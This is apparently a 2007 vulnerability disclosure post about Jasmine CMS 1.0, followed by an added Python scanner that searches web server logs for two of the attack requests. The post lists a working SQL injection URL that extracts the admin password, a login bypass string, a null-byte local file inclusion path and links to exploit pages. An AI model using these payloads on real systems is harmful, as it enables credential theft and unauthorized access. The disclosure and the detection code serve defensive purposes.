Tuesday 19 June 2007

Multiple Vulnerabilities In Jasmine CMS 1.0

Foreword:

If you're thinking about installing this appalling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. Listing every possible vulnerability would just be silly, so I'll list one of each attack type:

SQL Injection:

news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*

Admin Login Bypass:

Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*

Password = Anything or Nothing

Local File Inclusion:

admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00

...and I'm pretty sure there are tons of XSS vulns in here too.
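
To check whether an existing install has received the two URL-borne requests listed above, the web server access log can be scanned for them. The Python below is an added example, not code from the original post or from Jasmine CMS; the log lines are constructed, and the rules assume a legitimate item value is a plain integer and a legitimate u value is a simple name with no path characters. The login bypass is left out because it is assumed to arrive in login form fields, which a standard access log does not record.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jun/2007:10:00:01 +0000] "GET /news.php?item=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Jun/2007:10:02:13 +0000] "GET /news.php?item=-999%20UNION%20SELECT'
    '%200,password,0,0,0,0,username%20FROM%20user%20WHERE%20id=1/* HTTP/1.1" 200 733',
    '192.0.2.44 - - [19/Jun/2007:10:02:40 +0000] "GET /admin/plugin_manager.php'
    '?u=/constructed/local/file%00 HTTP/1.1" 200 1420',
    '192.0.2.10 - - [19/Jun/2007:10:05:09 +0000] "GET /admin/plugin_manager.php?u=gallery HTTP/1.1" 200 2048',
]

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return a list of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    if parts.path.endswith("/news.php"):
        for value in params.get("item", []):
            # Assumption: a legitimate item id is a plain non-negative integer.
            if not re.fullmatch(r"\d+", value):
                findings.append("news.php: non-integer item")
    elif parts.path.endswith("/admin/plugin_manager.php"):
        for value in params.get("u", []):
            if "\x00" in value:
                findings.append("plugin_manager.php: null byte in u")
            # Assumption: a legitimate plugin name has no path characters.
            elif not re.fullmatch(r"[A-Za-z0-9_-]+", value):
                findings.append("plugin_manager.php: unexpected characters in u")
    return findings

def scan(lines):
    """Return (client, target, findings) for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        findings = check_request(m.group(2))
        if findings:
            hits.append((m.group(1), m.group(2), findings))
    return hits

if __name__ == "__main__":
    for client, target, findings in scan(SAMPLE_LOG):
        print(client, target, "; ".join(findings))
```

A hit only shows that such a request was received; the response size and any follow-up activity from the same client still need to be reviewed.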

Exploit:

http://www.w4ck1ng.com/board/showthread.php/0day-jasmine-cms-1-5525.html?p=22785
http://milw0rm.com/exploits/4081